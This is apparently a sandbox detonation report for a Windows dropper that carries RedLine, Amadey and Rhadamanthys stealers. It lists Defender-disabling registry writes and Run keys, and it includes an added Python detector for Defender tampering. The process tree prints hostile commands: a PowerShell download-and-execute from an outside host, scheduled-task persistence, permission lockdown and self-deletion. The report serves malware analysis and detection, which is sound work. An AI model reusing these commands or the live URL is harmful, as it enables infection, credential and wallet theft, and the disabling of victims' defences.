Analysis Overview
SHA256
fb805377f70ff7b51f71c775cabda6fd28576b9f3fdd2d9abca22b91a125b931
Threat Level: Known bad
The file fb805377f70ff7b51f71c775cabda6fd28576b9f3fdd2d9abca22b91a125b931 was found to be: Known bad.
Malicious Activity Summary
RedLine
Modifies Windows Defender Real-time Protection settings
Aurora
Amadey
RedLine payload
Rhadamanthys
Detect rhadamanthys stealer shellcode
Downloads MZ/PE file
Blocklisted process makes network request
Loads dropped DLL
Checks computer location settings
Reads user/profile data of web browsers
Windows security modification
Executes dropped EXE
Adds Run key to start application
Checks installed software on the system
Accesses cryptocurrency files/wallets, possible credential harvesting
Suspicious use of NtSetInformationThreadHideFromDebugger
Enumerates physical storage devices
Program crash
Checks SCSI registry key(s)
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Creates scheduled task(s)
Runs ping.exe
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2023-03-21 15:09
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2023-03-21 15:09
Reported
2023-03-21 15:12
Platform
win10v2004-20230221-en
Max time kernel
150s
Max time network
152s
Command Line
Signatures
Amadey
Aurora
Detect rhadamanthys stealer shellcode
| Description | Indicator | Process | Target |
| 2 matches (no indicator, process or target detail captured in this export) | N/A | N/A | N/A |
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\v8031ED.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\v8031ED.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\v8031ED.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\tz1203.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\tz1203.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\tz1203.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\v8031ED.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\v8031ED.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\tz1203.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\tz1203.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\tz1203.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\v8031ED.exe | N/A |
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| 19 matches (no indicator, process or target detail captured in this export) | N/A | N/A | N/A |
Rhadamanthys
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\1000115001\sqlcmd.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\y67rZ35.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\zap5891.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\zap0848.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\zap0004.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\tz1203.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\v8031ED.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\w13dW92.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\xkivC10.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\y67rZ35.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000115001\sqlcmd.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000116001\serv.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000118001\svchost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Reads user/profile data of web browsers
Windows security modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\tz1203.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\v8031ED.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\v8031ED.exe | N/A |
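The two registry tables above (Real-Time Protection policy values set to 1, then Features\TamperProtection set to 0) are the report's evidence for ATT&CK T1562.001, Impair Defenses: Disable or Modify Tools. Two droppers do the work: v8031ED.exe writes through the 32-bit WOW6432Node view and tz1203.exe through the native view, so a detection keyed on the raw path would count them as different keys. The Python below is an added example and not part of the sandbox output: it parses rows in the report's own table layout, strips the WOW6432Node redirection so both sets of writes land on the same key, and emits one finding per disabling write. The list of value names treated as disabling, the Finding type and the summarize() view are the editor's assumptions; the sample rows are copied from the tables above except the last, which is constructed as a negative (a write that re-enables monitoring with value 0 and must not fire).

```python
"""Flag Windows Defender tampering in sandbox registry events.

Added example, not part of the sandbox report. Parses rows shaped like the
report's "| Set value (int) | <key>\\<name> = "<value>" | <process> | ... |"
tables, normalizes the WOW6432Node redirection, and returns one finding per
write that disables a Defender component."""
import re
from dataclasses import dataclass

# Policy values under ...\Policies\Microsoft\Windows Defender\Real-Time Protection
# that switch a protection component off when set to 1. The set is the editor's
# (assumption); the sandbox signature does not publish its own list.
RTP_DISABLE_VALUES = {
    "DisableRealtimeMonitoring",
    "DisableBehaviorMonitoring",
    "DisableOnAccessProtection",
    "DisableIOAVProtection",
    "DisableScanOnRealtimeEnable",
}

# One table row: "| Set value (int) | \REGISTRY\...\<name> = "<val>" | <process> | N/A |"
ROW_RE = re.compile(
    r'^\|\s*Set value \((?P<type>\w+)\)\s*\|\s*'
    r'(?P<key>\\REGISTRY\\[^=|]+?)\\(?P<name>[^\\=|]+?)\s*=\s*"(?P<val>[^"]*)"\s*\|\s*'
    r'(?P<proc>[^|]+?)\s*\|'
)

@dataclass(frozen=True)
class Finding:
    process: str
    value_name: str
    key: str        # WOW6432Node removed, so 32-bit and 64-bit writes compare equal
    technique: str  # ATT&CK technique ID

def normalize_key(key: str) -> str:
    """Drop the WOW6432Node component a 32-bit process is redirected through."""
    return re.sub(r"\\WOW6432Node", "", key, flags=re.IGNORECASE)

def defender_tamper_findings(rows):
    """Return a Finding for every row that disables Real-Time Protection or Tamper Protection."""
    findings = []
    for row in rows:
        m = ROW_RE.match(row)
        if not m:                       # "Key created" rows and non-matching lines are skipped
            continue
        key = normalize_key(m["key"])
        name, val = m["name"], m["val"]
        low = key.lower()
        in_rtp_policy = low.endswith(r"\policies\microsoft\windows defender\real-time protection")
        in_features = low.endswith(r"\microsoft\windows defender\features")
        if (in_rtp_policy and name in RTP_DISABLE_VALUES and val == "1") or \
           (in_features and name == "TamperProtection" and val == "0"):
            findings.append(Finding(m["proc"].strip(), name, key, "T1562.001"))
    return findings

def summarize(findings):
    """{process: sorted value names it tampered with}, for a one-line triage view."""
    out = {}
    for f in findings:
        out.setdefault(f.process, set()).add(f.value_name)
    return {p: sorted(v) for p, v in out.items()}

# Sample input: rows copied from the report's tables above; the last row is
# constructed (a re-enabling write, value 0) and must not produce a finding.
SAMPLE_ROWS = [
    r'| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\v8031ED.exe | N/A |',
    r'| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\tz1203.exe | N/A |',
    r'| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\tz1203.exe | N/A |',
    r'| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\v8031ED.exe | N/A |',
    r'| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "0" | C:\Windows\System32\svchost.exe | N/A |',
]

if __name__ == "__main__":
    for proc, names in summarize(defender_tamper_findings(SAMPLE_ROWS)).items():
        print(f"{proc}: {', '.join(names)}")
```

Where Tamper Protection is enabled on the victim, these writes are blocked or reverted, so the registry write event itself, rather than the resulting Defender state, is the reliable detection point; on the sandbox VM the writes succeeded, which is why the report records them as "Set value".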
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce | C:\Users\Admin\AppData\Local\Temp\fb805377f70ff7b51f71c775cabda6fd28576b9f3fdd2d9abca22b91a125b931.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\fb805377f70ff7b51f71c775cabda6fd28576b9f3fdd2d9abca22b91a125b931.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\zap5891.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\zap5891.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\zap0848.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\zap0848.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\zap0004.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\zap0004.exe | N/A |
Checks installed software on the system
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000116001\serv.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000116001\serv.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000116001\serv.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\v8031ED.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\w13dW92.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\1000116001\serv.exe |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 | C:\Users\Admin\AppData\Local\Temp\1000116001\serv.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID | C:\Users\Admin\AppData\Local\Temp\1000116001\serv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\1000116001\serv.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\1000116001\serv.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\1000116001\serv.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\tz1203.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\tz1203.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\v8031ED.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\v8031ED.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\w13dW92.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\w13dW92.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\xkivC10.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\xkivC10.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\tz1203.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\v8031ED.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\w13dW92.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\xkivC10.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\1000116001\serv.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\1000116001\serv.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\fb805377f70ff7b51f71c775cabda6fd28576b9f3fdd2d9abca22b91a125b931.exe
"C:\Users\Admin\AppData\Local\Temp\fb805377f70ff7b51f71c775cabda6fd28576b9f3fdd2d9abca22b91a125b931.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\zap5891.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\zap5891.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\zap0848.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\zap0848.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\zap0004.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\zap0004.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\tz1203.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\tz1203.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\v8031ED.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\v8031ED.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 3228 -ip 3228
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3228 -s 1040
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\w13dW92.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\w13dW92.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2552 -ip 2552
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2552 -s 1356
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\xkivC10.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\xkivC10.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\y67rZ35.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\y67rZ35.exe
C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe
"C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN legenda.exe /TR "C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe" /F
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "legenda.exe" /P "Admin:N"&&CACLS "legenda.exe" /P "Admin:R" /E&&echo Y|CACLS "..\f22b669919" /P "Admin:N"&&CACLS "..\f22b669919" /P "Admin:R" /E&&Exit
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
C:\Windows\SysWOW64\cacls.exe
CACLS "legenda.exe" /P "Admin:N"
C:\Windows\SysWOW64\cacls.exe
CACLS "legenda.exe" /P "Admin:R" /E
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
C:\Windows\SysWOW64\cacls.exe
CACLS "..\f22b669919" /P "Admin:N"
C:\Windows\SysWOW64\cacls.exe
CACLS "..\f22b669919" /P "Admin:R" /E
C:\Users\Admin\AppData\Local\Temp\1000115001\sqlcmd.exe
"C:\Users\Admin\AppData\Local\Temp\1000115001\sqlcmd.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://www.mdegmm.com/pdf/debug2.ps1')"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command IEX(New-Object Net.Webclient).DownloadString('https://www.mdegmm.com/pdf/debug2.ps1')
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\1000115001\sqlcmd.exe" >> NUL
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
C:\Users\Admin\AppData\Local\Temp\1000116001\serv.exe
"C:\Users\Admin\AppData\Local\Temp\1000116001\serv.exe"
C:\Users\Admin\AppData\Local\Temp\1000118001\svchost.exe
"C:\Users\Admin\AppData\Local\Temp\1000118001\svchost.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 2796 -ip 2796
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2796 -s 684
C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe
C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main
C:\Windows\SysWOW64\Wbem\wmic.exe
wmic os get Caption
C:\Windows\SysWOW64\cmd.exe
cmd /C "wmic path win32_VideoController get name"
C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\SysWOW64\cmd.exe
cmd /C "wmic cpu get name"
C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic cpu get name
